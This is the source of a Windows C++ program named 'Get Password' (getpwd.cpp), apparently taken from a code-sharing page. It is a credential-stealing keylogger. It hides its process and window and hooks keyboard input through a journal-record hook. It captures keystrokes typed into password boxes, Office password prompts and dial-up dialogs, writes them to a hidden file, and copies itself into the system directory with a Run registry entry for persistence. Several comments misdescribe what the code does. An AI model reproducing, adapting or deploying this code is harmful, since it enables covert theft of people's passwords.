📄 getpwd.cpp
字号:
#include <windows.h>
#define KeyPMask 0x80000000
#define SERVICE_PROC 1
#define UNSERVICE_PROC 0
#define RUN "\\GmkMon.exe"
typedef struct tagKEYDATA
{
char kKey;
SHORT kShift;
SHORT kCaps;
SHORT kNum;
BOOL bShift;
BOOL bCaps;
BOOL bNum;
}KEYDATA, *LPKEYDATA;
HHOOK hHook = NULL;
DWORD (WINAPI *RegisterServiceProcess)(DWORD,DWORD);
LRESULT CALLBACK WndProc (HWND, UINT, WPARAM, LPARAM) ;
LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam);
/*
* 函数功能:
* 该API函数完成装载一个DLL库,并注册当前的DLL服务进程。
* 返回值:
* 若注册成功则返回TRUE,否则返回FALSE。
*/
BOOL WINAPI HideProc(int mode)
{
HINSTANCE DLLInst=LoadLibrary("KERNEL32.DLL");
if(DLLInst)
{
RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))
GetProcAddress(DLLInst,"RegisterServiceProcess");
if(RegisterServiceProcess)
{
RegisterServiceProcess(GetCurrentProcessId(),mode);
return TRUE;
}
else
return FALSE;
}
else
return FALSE;
}
/*
* 函数功能:
* 该API函数用于判断密钥所在文件的类型,然后采用不同的算法进行截获,但首先必须获取文件的当前窗口的事件句柄。
*/
BOOL WINAPI IsPassWindow()
{
HWND hWnd,curHwnd;
TCHAR szTemp[MAX_PATH];
DWORD dwsTyle;
curHwnd=GetActiveWindow();
if(curHwnd==NULL)
return FALSE;
while(curHwnd!=NULL)
{
hWnd=curHwnd;
curHwnd=GetParent(hWnd);
}
dwsTyle=GetWindowLong(hWnd,GWL_STYLE);
if(dwsTyle & ES_PASSWORD) //普通密码框
return TRUE;
else if(!lstrcmp(szTemp,"EDTBX")) //Excel密码
return TRUE;
else if(!lstrcmp(szTemp,"RichEdit20W") && (dwsTyle & WS_SYSMENU)) //WORD密码
return TRUE;
GetWindowText(hWnd, szTemp, sizeof(szTemp));
if(!strncmp(szTemp, "连接到", 6)) //拨号网络
return TRUE;
return FALSE;
}
/*
* 函数功能:
* 该API函数实现密钥的截获。
*/
TCHAR WINAPI GetKey(int nKey)
{
KEYDATA kd;
kd.kShift=GetKeyState(VK_SHIFT);
kd.kCaps=GetKeyState(0x14);
kd.kNum=GetKeyState(0x90);
kd.bShift=(kd.kShift & KeyPMask)==KeyPMask;
kd.bCaps=(kd.kCaps & 1)==1;
kd.bNum=(kd.kNum & 1)==1;
if(nKey>=48 && nKey<=57) // 0-9
{
if(!kd.bShift)
return (kd.kKey=nKey);
else
return '*';
}
else if(nKey>=65 && nKey<=90) // a-z
{
if(!kd.bCaps)
{
if(kd.bShift)
kd.kKey=nKey;
else
kd.kKey=nKey+32;
}
else if(kd.bShift)
kd.kKey=nKey+32;
else
kd.kKey=nKey;
return kd.kKey;
}
else if(nKey>=96 && nKey<=105) // 小键盘0-9
{
if(kd.bNum)
return (kd.kKey=(nKey-96+48));
else
return '*';
}
else if(nKey>=186 && nKey<=222) // 其他键
{
switch(nKey)
{
case 186:
if(!kd.bShift)
kd.kKey=';';
else
kd.kKey=':';
break;
case 187:
if(!kd.bShift)
kd.kKey='=';
else
kd.kKey='+';
break;
case 188:
if(!kd.bShift)
kd.kKey=',';
else
kd.kKey='<' ;
break;
case 189:
if(!kd.bShift)
kd.kKey='-';
else
kd.kKey='_';
break;
case 190:
if(!kd.bShift)
kd.kKey='.';
else
kd.kKey='>';
break;
case 191:
if(!kd.bShift)
kd.kKey='/';
else
kd.kKey='?';
break;
case 192:
if(!kd.bShift)
kd.kKey='`';
else
kd.kKey='~' ;
break;
case 219:
if(!kd.bShift)
kd.kKey='[';
else
kd.kKey='{';
break;
case 220:
if(!kd.bShift)
kd.kKey='\\';
else
kd.kKey='|';
break;
case 221:
if(!kd.bShift)
kd.kKey=']';
else
kd.kKey='}';
break;
case 222:
if(!kd.bShift)
kd.kKey='\\';
else
kd.kKey='\\';
break;
default:
kd.kKey='n';
break;
}
if(kd.kKey!='n')
return kd.kKey;
else
return '*';
}
else
return '*';
}
/*
* 函数功能:
* 修改所要截获密钥的目标文件,即将文件中的密钥从文件中移除或修改。
*/
void WINAPI WritePassFile(int nKey)
{
HANDLE hFile;
DWORD dwBytesWrite=1;
TCHAR lpStr;
hFile=CreateFile("C:\\passdata.txt",
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_HIDDEN,
NULL
);
SetFilePointer(hFile,0,NULL,FILE_END);
lpStr=GetKey(LOBYTE(nKey));
WriteFile(hFile,&lpStr,1,&dwBytesWrite,0);
CloseHandle(hFile);
}
/*
* 函数功能:
* 安装Windows Hook程序。
*/
void WINAPI InstallHook(HINSTANCE hInstance)
{
if(hHook==NULL)
hHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalRecordProc,hInstance,0);
}
/*
* 函数功能:
* 卸载当前的Windows Hook程序。
*/
void WINAPI UninstallHook()
{
if(hHook!=NULL)
UnhookWindowsHookEx(hHook);
}
/*
* 函数功能:
* 回调日志中记录的进程程序,返回下一所要安装的Windows Hook程序的句柄。
*/
LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam)
{
EVENTMSG *pMess=(EVENTMSG *)lParam;
POINT pt;
switch(pMess->message)
{
case WM_KEYDOWN:
if(IsPassWindow())
WritePassFile(LOBYTE(pMess->paramL));
break;
case WM_LBUTTONDBLCLK:
GetCursorPos(&pt);
break;
}
return CallNextHookEx(hHook,nCode,wParam,lParam);
}
/*
* 函数功能:
* Windows主窗口函数,它完成对其它进程的调用、Windows Hook的控制等。
* 这是Windows应用的进程程序。
*/
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow)
{
HANDLE hMutex=CreateMutex(NULL,FALSE,"GMKRunOnlyOne");
if(hMutex==NULL||ERROR_ALREADY_EXISTS==GetLastError())
ExitProcess(1);
static char szAppName[] = "Get Password" ;
HWND hwnd ;
MSG msg ;
WNDCLASSEX wndclass ;
HKEY hKey=0;
DWORD disp=0;
LONG lResult;
TCHAR szKey[MAX_PATH];
TCHAR szSysDir[MAX_PATH+25];
TCHAR szFileName[MAX_PATH];
wndclass.cbSize = sizeof (wndclass) ;
wndclass.style = CS_HREDRAW | CS_VREDRAW ;
wndclass.lpfnWndProc = WndProc ;
wndclass.cbClsExtra = 0 ;
wndclass.cbWndExtra = 0 ;
wndclass.hInstance = hInstance ;
wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION) ;
wndclass.hCursor = LoadCursor (NULL, IDC_ARROW) ;
wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH) ;
wndclass.lpszMenuName = NULL ;
wndclass.lpszClassName = szAppName ;
wndclass.hIconSm = LoadIcon (NULL, IDI_APPLICATION) ;
RegisterClassEx(&wndclass);
hwnd=CreateWindow( szAppName, "Get Password",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT,
CW_USEDEFAULT, CW_USEDEFAULT,
NULL, NULL, hInstance, NULL
);
ShowWindow(hwnd,SW_HIDE);
UpdateWindow(hwnd);
HideProc(SERVICE_PROC);
InstallHook(hInstance);
GetSystemDirectory(szSysDir,MAX_PATH);
lstrcat(szSysDir,RUN);
GetModuleFileName(NULL,szFileName,MAX_PATH);
CopyFile(szFileName,szSysDir,FALSE);
lstrcpy(szKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
lResult=RegCreateKeyEx( HKEY_LOCAL_MACHINE,
szKey,
0,
NULL,
REG_OPTION_VOLATILE,
KEY_ALL_ACCESS,
NULL,
&hKey,
&disp
);
if(lResult==ERROR_SUCCESS)
{
lResult=RegSetValueEx(hKey,"GmkMon",0,REG_SZ,(const unsigned char*)szSysDir,lstrlen(szSysDir));
RegCloseKey(hKey);
}
while (GetMessage (&msg, NULL, 0, 0))
{
TranslateMessage (&msg) ;
DispatchMessage (&msg) ;
}
return msg.wParam ;
}
/*
* 函数功能:
* 回调Windows进程程序。
*/
LRESULT CALLBACK WndProc (HWND hwnd, UINT iMsg, WPARAM wParam, LPARAM lParam)
{
switch (iMsg)
{
case WM_PAINT:
return 0 ;
case WM_DESTROY:
UninstallHook();
PostQuitMessage (0) ;
return 0 ;
}
return DefWindowProc(hwnd,iMsg,wParam,lParam);
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -